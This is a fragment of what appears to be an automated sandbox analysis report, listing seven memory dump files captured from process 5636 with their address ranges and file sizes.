                                                                                                                                                                                            • memory/5636-1448-0x0000000000FA0000-0x0000000000FDA000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              232KB

                                                                                                                                                                                            • memory/5636-1226-0x0000000000EF0000-0x0000000000EFA000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                            • memory/5636-1409-0x0000000000F50000-0x0000000000F5A000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                            • memory/5636-352-0x0000000000880000-0x0000000000890000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/5636-1381-0x0000000000F70000-0x0000000000F82000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              72KB

                                                                                                                                                                                            • memory/5636-1380-0x0000000000FF0000-0x0000000000FFA000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              40KB

                                                                                                                                                                                            • memory/5636-1629-0x000000001B830000-0x000000001B870000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              256KB